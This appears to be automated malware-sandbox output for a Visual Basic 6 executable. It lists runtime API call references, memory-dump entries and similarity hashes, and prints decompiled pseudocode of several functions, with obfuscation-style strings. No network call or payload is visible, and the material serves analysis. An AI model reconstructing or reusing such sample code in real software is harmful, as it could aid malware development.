      0x0041cd04
      0x0041cd09
      0x0041cd0f
      0x0041cd25
      0x0041cd32
      0x0041cd40
      0x0041cd46
      0x0041cd54
      0x0041cd71
      0x0041cd56
      0x0041cd56
      0x0041cd5b
      0x0041cd60
      0x0041cd65
      0x0041cd65
      0x0041cd83
      0x0041cd9e
      0x0041cda1
      0x0041cda3
      0x0041cdb0
      0x0041cdd2
      0x0041cdb2
      0x0041cdb2
      0x0041cdb4
      0x0041cdb9
      0x0041cdbf
      0x0041cdc5
      0x0041cdca
      0x0041cdca
      0x0041cddf
      0x0041cdfa
      0x0041ce00
      0x0041ce02
      0x0041ce0f
      0x0041ce34
      0x0041ce11
      0x0041ce11
      0x0041ce16
      0x0041ce1b
      0x0041ce21
      0x0041ce27
      0x0041ce2c
      0x0041ce2c
      0x0041ce41
      0x0041ce47
      0x0041ce57
      0x0041ce62
      0x0041ce67
      0x0041ce6e
      0x0041ce78
      0x0041ce88
      0x0041ce89
      0x0041ce93
      0x0041ce9e
      0x0041cea3
      0x0041ceaa
      0x0041ceb8
      0x0041ced5
      0x0041ceba
      0x0041ceba
      0x0041cebf
      0x0041cec4
      0x0041cec9
      0x0041cec9
      0x0041cee7
      0x0041cf02
      0x0041cf05
      0x0041cf07
      0x0041cf14
      0x0041cf36
      0x0041cf16
      0x0041cf16
      0x0041cf18
      0x0041cf1d
      0x0041cf23
      0x0041cf29
      0x0041cf2e
      0x0041cf2e
      0x0041cf43
      0x0041cf68
      0x0041cf6b
      0x0041cf6d
      0x0041cf7a
      0x0041cf9c
      0x0041cf7c
      0x0041cf7c
      0x0041cf7e
      0x0041cf83
      0x0041cf89
      0x0041cf8f
      0x0041cf94
      0x0041cf94
      0x0041cfa9
      0x0041cfaf
      0x0041cfbf
      0x0041cfca
      0x0041cfca
      0x0041cfcf
      0x0041cfdc
      0x0041cfdd
      0x0041cfe3
      0x0041cfe4
      0x0041cfe9
      0x0041cfee
      0x0041cfef
      0x0041cff4
      0x0041cffa
      0x0041d005
      0x0041d00c
      0x0041d00d
      0x0041d012
      0x0041d028
      0x0041d035
      0x0041d036
      0x0041d03b
      0x0041d049
      0x0041d04f
      0x0041d056
      0x0041d060
      0x0041d070
      0x0041d077
      0x0041d078
      0x0041d083
      0x0041d084
      0x0041d08e
      0x0041d099
      0x0041d0a0
      0x0041d0a1
      0x0041d0a3
      0x0041d0ab
      0x0041d0b9
      0x0041d0d6
      0x0041d0bb
      0x0041d0bb
      0x0041d0c0
      0x0041d0c5
      0x0041d0ca
      0x0041d0ca
      0x0041d0e8
      0x0041d103
      0x0041d106
      0x0041d108
      0x0041d115
      0x0041d137
      0x0041d117
      0x0041d117
      0x0041d119
      0x0041d11e
      0x0041d124
      0x0041d12a
      0x0041d12f
      0x0041d12f
      0x0041d144
      0x0041d15f
      0x0041d162
      0x0041d164
      0x0041d171
      0x0041d193
      0x0041d173
      0x0041d173
      0x0041d175
      0x0041d17a
      0x0041d180
      0x0041d186
      0x0041d18b
      0x0041d18b
      0x0041d1a1
      0x0041d1ab
      0x0041d1b0
      0x0041d1b7
      0x0041d1c5
      0x0041d1e2
      0x0041d1c7
      0x0041d1c7
      0x0041d1cc
      0x0041d1d1
      0x0041d1d6
      0x0041d1d6
      0x0041d1f4
      0x0041d20f
      0x0041d212
      0x0041d214
      0x0041d221
      0x0041d243
      0x0041d223
      0x0041d223
      0x0041d225
      0x0041d22a
      0x0041d230
      0x0041d236
      0x0041d23b
      0x0041d23b
      0x0041d250
      0x0041d256
      0x0041d260
      0x0041d26c
      0x0041d26d
      0x0041d27a
      0x0041d27b
      0x0041d27c
      0x0041d27d
      0x0041d289
      0x0041d28f
      0x0041d296
      0x0041d2aa
      0x0041d2ad
      0x0041d2af
      0x0041d2bc
      0x0041d2de
      0x0041d2be
      0x0041d2be
      0x0041d2c0
      0x0041d2c5
      0x0041d2cb
      0x0041d2d1
      0x0041d2d6
      0x0041d2d6
      0x0041d2eb
      0x0041d2f2
      0x0041d2f3
      0x0041d2f5
      0x0041d2fa
      0x0041d049
      0x0041d2fd
      0x0041d304
      0x0041d30e
      0x0041d338
      0x0041d344
      0x0041d350
      0x0041d356
      0x0041d36c
      0x0041d372
      0x0041d37f
      0x0041d3a1
      0x0041d381
      0x0041d381
      0x0041d386
      0x0041d38b
      0x0041d38e
      0x0041d394
      0x0041d399
      0x0041d399
      0x0041d3ae
      0x0041d3b3
      0x0041d3ba
      0x0041d425
      0x0041d426
      0x0041d42b
      0x0041d433
      0x0041d43b
      0x0041d443
      0x0041d44b
      0x0041d453
      0x0041d45b
      0x0041d463
      0x0041d468
      0x0041d46e
      0x0041d46f
      0x0041d474
      0x0041d47f
      0x0041d48a
      0x0041d48f

      APIs
      • __vbaChkstk.MSVBVM60(?,00401216), ref: 0041C442
      • __vbaStrCat.MSVBVM60(0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C492
      • __vbaStrMove.MSVBVM60(0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C49F
      • __vbaInStr.MSVBVM60(00000000,0040306C,00000000,0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C4AC
      • __vbaFreeStr.MSVBVM60(00000000,0040306C,00000000,0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C4C8
      • __vbaOnError.MSVBVM60(000000FF,00000000,0040306C,00000000,0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C4E5
      • __vbaOnError.MSVBVM60(000000FF,000000FF,00000000,0040306C,00000000,0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C4F3
      • __vbaNew2.MSVBVM60(00403090,0041F5F0,000000FF,000000FF,00000000,0040306C,00000000,0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C512
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,0000004C), ref: 0041C577
      • __vbaChkstk.MSVBVM60(00000000,?,00403080,0000004C), ref: 0041C5AB
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030A0,0000002C), ref: 0041C5F1
      • __vbaFreeObj.MSVBVM60(00000000,?,004030A0,0000002C), ref: 0041C60B
      • #573.MSVBVM60(?,00000002), ref: 0041C639
      • __vbaStrCat.MSVBVM60(004030BC,004030B4,?,00000002), ref: 0041C648
      • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,004030BC,004030B4,?,00000002), ref: 0041C66B
      • __vbaFreeVarList.MSVBVM60(00000003,00000002,?,00008008,00008008,?,?,?,?,?,004030BC,004030B4,?,00000002), ref: 0041C68E
      • #598.MSVBVM60(?,?,?,00401216), ref: 0041C6AC
      • #611.MSVBVM60(?,?,?,00401216), ref: 0041C6B8
      • __vbaStrMove.MSVBVM60(?,?,?,00401216), ref: 0041C6C2
      • #685.MSVBVM60(?,?,?,00401216), ref: 0041C6CE
      • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,00401216), ref: 0041C6DB
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030C0,00000044), ref: 0041C78C
      • __vbaFreeObj.MSVBVM60(00000000,?,004030C0,00000044), ref: 0041C7A6
      • __vbaFreeVarList.MSVBVM60(00000004,0000000A,0000000A,0000000A,0000000A), ref: 0041C7C9
      • __vbaStrCopy.MSVBVM60 ref: 0041C7ED
      • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041C7FA
      • __vbaStrToAnsi.MSVBVM60(?,ANDREWARTHA,00297142,0006317B,?,00000000), ref: 0041C817
      • __vbaSetSystemError.MSVBVM60(?,00000000,?,ANDREWARTHA,00297142,0006317B,?,00000000), ref: 0041C82F
      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000,?,ANDREWARTHA,00297142,0006317B,?,00000000), ref: 0041C863
      • __vbaStrCat.MSVBVM60(4:4,00403114,?,?,?,?,?,?,?,?,00000000,?,?,?,00401216), ref: 0041C88B
      • __vbaStrMove.MSVBVM60(4:4,00403114,?,?,?,?,?,?,?,?,00000000,?,?,?,00401216), ref: 0041C898
      • #541.MSVBVM60(?,00000000,4:4,00403114,?,?,?,?,?,?,?,?,00000000), ref: 0041C8A5
      • __vbaStrVarMove.MSVBVM60(?,?,00000000,4:4,00403114,?,?,?,?,?,?,?,?,00000000), ref: 0041C8B1
      • __vbaStrMove.MSVBVM60(?,?,00000000,4:4,00403114,?,?,?,?,?,?,?,?,00000000), ref: 0041C8BE
      • __vbaFreeStr.MSVBVM60(?,?,00000000,4:4,00403114,?,?,?,?,?,?,?,?,00000000), ref: 0041C8C9
      • __vbaFreeVar.MSVBVM60(?,?,00000000,4:4,00403114,?,?,?,?,?,?,?,?,00000000), ref: 0041C8D4
      • #703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041C903
      • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041C90D
      • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041C918
      • __vbaNew2.MSVBVM60(00403090,0041F5F0,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041C93E
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,0000001C), ref: 0041C9A3
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403128,00000064), ref: 0041CA01
      • __vbaFreeObj.MSVBVM60(00000000,?,00403128,00000064), ref: 0041CA26
      • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00000000,?,?,?,00401216), ref: 0041CA3D
      • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,00401216), ref: 0041CA4A
      • __vbaSetSystemError.MSVBVM60(004F0673,0059AE9B,002EA394,0083BCF2,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0041CA75
      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041CAA2
      • __vbaNew2.MSVBVM60(00403090,0041F5F0,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0041CAD3
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,00000014), ref: 0041CB38
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403150,00000060), ref: 0041CB94
      • __vbaStrMove.MSVBVM60(00000000,?,00403150,00000060), ref: 0041CBC4
      • __vbaFreeObj.MSVBVM60(00000000,?,00403150,00000060), ref: 0041CBCF
      • __vbaNew2.MSVBVM60(00403090,0041F5F0), ref: 0041CBEE
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,00000014), ref: 0041CC53
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403150,00000140), ref: 0041CCB5
      • __vbaFreeObj.MSVBVM60(00000000,?,00403150,00000140), ref: 0041CCDA
      • __vbaEnd.MSVBVM60(00000000,?,00403150,00000140), ref: 0041CCE6
      • __vbaStrToAnsi.MSVBVM60(?,Contangoes3,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0041CCFE
      • __vbaSetSystemError.MSVBVM60(00000000,?,Contangoes3,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0041CD0F
      • __vbaFreeStr.MSVBVM60(00000000,00000000,Contangoes3), ref: 0041CD32
      • __vbaNew2.MSVBVM60(00403090,0041F5F0), ref: 0041CD60
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,00000014), ref: 0041CDC5
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403150,00000130), ref: 0041CE27
      • __vbaStrMove.MSVBVM60(00000000,?,00403150,00000130), ref: 0041CE57
      • __vbaFreeObj.MSVBVM60(00000000,?,00403150,00000130), ref: 0041CE62
      • #536.MSVBVM60(00000002), ref: 0041CE89
      • __vbaStrMove.MSVBVM60(00000002), ref: 0041CE93
      • __vbaFreeVar.MSVBVM60(00000002), ref: 0041CE9E
      • __vbaNew2.MSVBVM60(00403090,0041F5F0,00000002), ref: 0041CEC4
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,0000004C), ref: 0041CF29
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030A0,00000024), ref: 0041CF8F
      • __vbaStrMove.MSVBVM60(00000000,?,004030A0,00000024), ref: 0041CFBF
      • __vbaFreeObj.MSVBVM60(00000000,?,004030A0,00000024), ref: 0041CFCA
      • __vbaRecUniToAnsi.MSVBVM60(00402E70,?,?), ref: 0041CFE9
      • __vbaSetSystemError.MSVBVM60(00000000,00402E70,?,?), ref: 0041CFFA
      • __vbaRecAnsiToUni.MSVBVM60(00402E70,?,?,00000000,00402E70,?,?), ref: 0041D012
      • __vbaRecDestructAnsi.MSVBVM60(00402E70,?,00402E70,?,?,00000000,00402E70,?,?), ref: 0041D03B
      • #613.MSVBVM60(?,00000002,00402E70,?,00402E70,?,?,00000000,00402E70,?,?), ref: 0041D078
      • __vbaStrVarMove.MSVBVM60(?,?,00000002,00402E70,?,00402E70,?,?,00000000,00402E70,?,?), ref: 0041D084
      • __vbaStrMove.MSVBVM60(?,?,00000002,00402E70,?,00402E70,?,?,00000000,00402E70,?,?), ref: 0041D08E
      • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002,00402E70,?,00402E70,?,?,00000000,00402E70,?,?), ref: 0041D0A3
      • __vbaNew2.MSVBVM60(00403090,0041F5F0,00000000,?,Contangoes3,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0041D0C5
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,00000014), ref: 0041D12A
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403150,00000078), ref: 0041D186
      • __vbaFreeObj.MSVBVM60(00000000,?,00403150,00000078), ref: 0041D1AB
      • __vbaNew2.MSVBVM60(00403090,0041F5F0), ref: 0041D1D1
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,0000001C), ref: 0041D236
      • __vbaChkstk.MSVBVM60(00000000,?,00403080,0000001C), ref: 0041D26D
      • __vbaCastObj.MSVBVM60(?,004031A0), ref: 0041D289
      • __vbaObjSet.MSVBVM60(?,00000000,?,004031A0), ref: 0041D296
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403128,00000058), ref: 0041D2D1
      • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041D2F5
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402DA0,000006F8), ref: 0041D394
      • __vbaFreeVar.MSVBVM60(00000000,?,00402DA0,000006F8), ref: 0041D3AE
      • __vbaRecDestructAnsi.MSVBVM60(00402E70,?,0041D490), ref: 0041D42B
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D433
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D43B
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D443
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D44B
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D453
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D45B
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D463
      • __vbaRecDestruct.MSVBVM60(00402E70,?,00402E70,?,0041D490), ref: 0041D474
      • __vbaFreeObj.MSVBVM60(00402E70,?,00402E70,?,0041D490), ref: 0041D47F
      • __vbaFreeStr.MSVBVM60(00402E70,?,00402E70,?,0041D490), ref: 0041D48A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.819980208.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.819975398.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.819998176.000000000041F000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.820004229.0000000000421000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$CheckHresult$Move$AnsiNew2$ErrorList$System$ChkstkDestruct$Copy$#536#541#573#598#611#613#685#703Cast
      • String ID: $$4:4$ANDREWARTHA$Contangoes3$Dorosoma5$K$Lstes8$iliau$stretchier$thyroidization
      • API String ID: 1936441329-1455819464
      • Opcode ID: 32fc5b825a822ca4115a684ff59b23398f5c730815832415407f1e27a56c4691
      • Instruction ID: e18fc50dca83c5942d8ada7b5ee78521a54f5c04e9bb50d627d11fda0843cba9
      • Opcode Fuzzy Hash: 32fc5b825a822ca4115a684ff59b23398f5c730815832415407f1e27a56c4691
      • Instruction Fuzzy Hash: 8492E371940228AFDB61DF60CC49BDDB7B5AF09305F1040EAE50DBA2A1DB785AC88F59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 52%
      			E0041D4AF(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v24;
      				intOrPtr _v28;
      				void* _v32;
      				void* _v36;
      				void* _v40;
      				intOrPtr _v44;
      				void* _v48;
      				signed int _v52;
      				char _v56;
      				char _v60;
      				void* _v64;
      				intOrPtr _v72;
      				char _v80;
      				char* _v88;
      				intOrPtr _v96;
      				void* _v100;
      				signed int _v104;
      				intOrPtr* _v108;
      				signed int _v112;
      				intOrPtr _v120;
      				intOrPtr* _v124;
      				signed int _v128;
      				signed int _v132;
      				signed int _t74;
      				signed int _t81;
      				signed int _t88;
      				signed int _t93;
      				intOrPtr _t124;
      
      				_push(0x401216);
      				_push( *[fs:0x0]);
      				 *[fs:0x0] = _t124;
      				_push(0x70);
      				L00401210();
      				_v12 = _t124;
      				_v8 = 0x4011d8;
      				L00401336();
      				_v72 = 1;
      				_v80 = 2;
      				_push(0xfffffffe);
      				_push(0xfffffffe);
      				_push(0xfffffffe);
      				_push(0xffffffff);
      				_push( &_v80); // executed
      				L00401312(); // executed
      				L00401390();
      				L00401318();
      				_v88 = L"PRESSIE";
      				_v96 = 8;
      				L004012CA();
      				_t74 =  &_v80;
      				_push(_t74);
      				L004012D0();
      				L00401390();
      				_push(_t74);
      				_push("Str");
      				_push(0x4031f0);
      				L0040138A();
      				L00401390();
      				_push(_t74);
      				_push(0x4031fc);
      				L0040138A();
      				L00401390();
      				_push(_t74);
      				L004012D6();
      				asm("sbb eax, eax");
      				_v100 =  ~( ~( ~_t74));
      				_push( &_v60);
      				_push( &_v56);
      				_push( &_v52);
      				_push(3);
      				L0040132A();
      				L00401318();
      				_t81 = _v100;
      				if(_t81 != 0) {
      					_v72 = 1;
      					_v80 = 2;
      					_push(0xfffffffe);
      					_push(0xfffffffe);
      					_push(0xfffffffe);
      					_push(0xffffffff);
      					_push( &_v80);
      					L00401312();
      					L00401390();
      					L00401318();
      					if( *0x41f5f0 != 0) {
      						_v124 = 0x41f5f0;
      					} else {
      						_push(0x41f5f0);
      						_push(0x403090);
      						L00401378();
      						_v124 = 0x41f5f0;
      					}
      					_v100 =  *_v124;
      					_t88 =  *((intOrPtr*)( *_v100 + 0x14))(_v100,  &_v64);
      					asm("fclex");
      					_v104 = _t88;
      					if(_v104 >= 0) {
      						_v128 = _v128 & 0x00000000;
      					} else {
      						_push(0x14);
      						_push(0x403080);
      						_push(_v100);
      						_push(_v104);
      						L00401372();
      						_v128 = _t88;
      					}
      					_v108 = _v64;
      					_t93 =  *((intOrPtr*)( *_v108 + 0x60))(_v108,  &_v52);
      					asm("fclex");
      					_v112 = _t93;
      					if(_v112 >= 0) {
      						_v132 = _v132 & 0x00000000;
      					} else {
      						_push(0x60);
      						_push(0x403150);
      						_push(_v108);
      						_push(_v112);
      						L00401372();
      						_v132 = _t93;
      					}
      					_t81 = _v52;
      					_v120 = _t81;
      					_v52 = _v52 & 0x00000000;
      					L00401390();
      					L0040136C();
      					_push(0xe5);
      					L004012C4();
      					_v44 = _t81;
      				}
      				_v28 = 0x26222e40;
      				_v24 = 0x5afd;
      				_push(0x41d707);
      				L00401384();
      				L00401384();
      				L00401384();
      				L00401384();
      				return _t81;
      			}

































      0x0041d4b4
      0x0041d4bf
      0x0041d4c0
      0x0041d4c7
      0x0041d4ca
      0x0041d4d2
      0x0041d4d5
      0x0041d4e2
      0x0041d4e7
      0x0041d4ee
      0x0041d4f5
      0x0041d4f7
      0x0041d4f9
      0x0041d4fb
      0x0041d500
      0x0041d501
      0x0041d50b
      0x0041d513
      0x0041d518
      0x0041d51f
      0x0041d52c
      0x0041d531
      0x0041d534
      0x0041d535
      0x0041d53f
      0x0041d544
      0x0041d545
      0x0041d54a
      0x0041d54f
      0x0041d559
      0x0041d55e
      0x0041d55f
      0x0041d564
      0x0041d56e
      0x0041d573
      0x0041d574
      0x0041d57b
      0x0041d581
      0x0041d588
      0x0041d58c
      0x0041d590
      0x0041d591
      0x0041d593
      0x0041d59e
      0x0041d5a3
      0x0041d5a9
      0x0041d5af
      0x0041d5b6
      0x0041d5bd
      0x0041d5bf
      0x0041d5c1
      0x0041d5c3
      0x0041d5c8
      0x0041d5c9
      0x0041d5d3
      0x0041d5db
      0x0041d5e7
      0x0041d601
      0x0041d5e9
      0x0041d5e9
      0x0041d5ee
      0x0041d5f3
      0x0041d5f8
      0x0041d5f8
      0x0041d60d
      0x0041d61c
      0x0041d61f
      0x0041d621
      0x0041d628
      0x0041d641
      0x0041d62a
      0x0041d62a
      0x0041d62c
      0x0041d631
      0x0041d634
      0x0041d637
      0x0041d63c
      0x0041d63c
      0x0041d648
      0x0041d657
      0x0041d65a
      0x0041d65c
      0x0041d663
      0x0041d67c
      0x0041d665
      0x0041d665
      0x0041d667
      0x0041d66c
      0x0041d66f
      0x0041d672
      0x0041d677
      0x0041d677
      0x0041d680
      0x0041d683
      0x0041d686
      0x0041d690
      0x0041d698
      0x0041d69d
      0x0041d6a2
      0x0041d6a7
      0x0041d6a7
      0x0041d6aa
      0x0041d6b1
      0x0041d6b8
      0x0041d6e9
      0x0041d6f1
      0x0041d6f9
      0x0041d701
      0x0041d706

      APIs
      • __vbaChkstk.MSVBVM60(?,00401216), ref: 0041D4CA
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 0041D4E2
      • #703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D501
      • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D50B
      • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D513
      • __vbaVarDup.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D52C
      • #591.MSVBVM60(00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D535
      • __vbaStrMove.MSVBVM60(00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D53F
      • __vbaStrCat.MSVBVM60(004031F0,Str,00000000,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D54F
      • __vbaStrMove.MSVBVM60(004031F0,Str,00000000,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D559
      • __vbaStrCat.MSVBVM60(004031FC,00000000,004031F0,Str,00000000,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D564
      • __vbaStrMove.MSVBVM60(004031FC,00000000,004031F0,Str,00000000,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D56E
      • __vbaStrCmp.MSVBVM60(00000000,004031FC,00000000,004031F0,Str,00000000,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D574
      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,004031FC,00000000,004031F0,Str,00000000,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D593
      • __vbaFreeVar.MSVBVM60 ref: 0041D59E
      • #703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D5C9
      • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D5D3
      • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D5DB
      • __vbaNew2.MSVBVM60(00403090,0041F5F0,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D5F3
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,00000014,?,?,?,?,?,?,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D637
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403150,00000060,?,?,?,?,?,?,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D672
      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D690
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D698
      • #570.MSVBVM60(000000E5,?,?,?,?,?,?,?,?,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D6A2
      • __vbaFreeStr.MSVBVM60(0041D707,?,?,?,00401216), ref: 0041D6E9
      • __vbaFreeStr.MSVBVM60(0041D707,?,?,?,00401216), ref: 0041D6F1
      • __vbaFreeStr.MSVBVM60(0041D707,?,?,?,00401216), ref: 0041D6F9
      • __vbaFreeStr.MSVBVM60(0041D707,?,?,?,00401216), ref: 0041D701
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.819980208.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.819975398.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.819998176.000000000041F000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.820004229.0000000000421000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$Move$#703CheckHresult$#570#591ChkstkCopyListNew2
      • String ID: @."&$Str
      • API String ID: 4270550733-1663706558
      • Opcode ID: 03b625aad5c5081e5000b85ec7773ad0e9c3483ea171dd5714623e20d20fbb98
      • Instruction ID: 405447a9d0b12a2767f31e9e44e8fb0887d3e74e02d74b2c57b437482774d9bd
      • Opcode Fuzzy Hash: 03b625aad5c5081e5000b85ec7773ad0e9c3483ea171dd5714623e20d20fbb98
      • Instruction Fuzzy Hash: E361F971D0020DABDB14EFA5C845ADEBBB9BF04318F20422AF415BB5E1DB785945CB58
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 54%
      			E0041D85E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				char _v24;
      				intOrPtr _v28;
      				intOrPtr _v32;
      				char _v36;
      				intOrPtr _v44;
      				intOrPtr _v52;
      				intOrPtr _v60;
      				intOrPtr _v68;
      				char _v72;
      				signed int _v76;
      				signed int _v84;
      				signed int _v88;
      				signed int _t50;
      				signed int _t62;
      				void* _t67;
      				void* _t74;
      				intOrPtr _t76;
      
      				_t67 = __edx;
      				 *[fs:0x0] = _t76;
      				L00401210();
      				_v12 = _t76;
      				_v8 = 0x4011f8;
      				L004012AC();
      				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401216, __ecx, __ecx, _t74);
      				asm("fclex");
      				_v76 = _t50;
      				if(_v76 >= 0) {
      					_v84 = _v84 & 0x00000000;
      				} else {
      					_push(0x58);
      					_push(0x402d70);
      					_push(_a4);
      					_push(_v76);
      					L00401372();
      					_v84 = _t50;
      				}
      				_v32 = _v72;
      				L004012AC();
      				L004012A6();
      				_v28 = E0041DA8F( &_v36);
      				L0040136C();
      				_v32 = E0041DA8F(_v28) + 0x2b0;
      				E0041DB97(_t67, _v32, _a8);
      				_v60 = 0x80020004;
      				_v68 = 0xa;
      				_v44 = 0x80020004;
      				_v52 = 0xa;
      				L00401210();
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				L00401210();
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
      				asm("fclex");
      				_v76 = _t62;
      				if(_v76 >= 0) {
      					_v88 = _v88 & 0x00000000;
      				} else {
      					_push(0x2b0);
      					_push(0x402d70);
      					_push(_a4);
      					_push(_v76);
      					L00401372();
      					_v88 = _t62;
      				}
      				_push(0x41d9a1);
      				L0040136C();
      				return _t62;
      			}






















      0x0041d85e
      0x0041d86f
      0x0041d879
      0x0041d881
      0x0041d884
      0x0041d892
      0x0041d8a3
      0x0041d8a6
      0x0041d8a8
      0x0041d8af
      0x0041d8c8
      0x0041d8b1
      0x0041d8b1
      0x0041d8b3
      0x0041d8b8
      0x0041d8bb
      0x0041d8be
      0x0041d8c3
      0x0041d8c3
      0x0041d8cf
      0x0041d8d9
      0x0041d8e2
      0x0041d8ed
      0x0041d8f3
      0x0041d905
      0x0041d90e
      0x0041d913
      0x0041d91a
      0x0041d921
      0x0041d928
      0x0041d932
      0x0041d93c
      0x0041d93d
      0x0041d93e
      0x0041d93f
      0x0041d943
      0x0041d94d
      0x0041d94e
      0x0041d94f
      0x0041d950
      0x0041d959
      0x0041d95f
      0x0041d961
      0x0041d968
      0x0041d984
      0x0041d96a
      0x0041d96a
      0x0041d96f
      0x0041d974
      0x0041d977
      0x0041d97a
      0x0041d97f
      0x0041d97f
      0x0041d988
      0x0041d99b
      0x0041d9a0

      APIs
      • __vbaChkstk.MSVBVM60(?,00401216), ref: 0041D879
      • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401216), ref: 0041D892
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D70,00000058), ref: 0041D8BE
      • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041D8D9
      • #644.MSVBVM60(?,?,?), ref: 0041D8E2
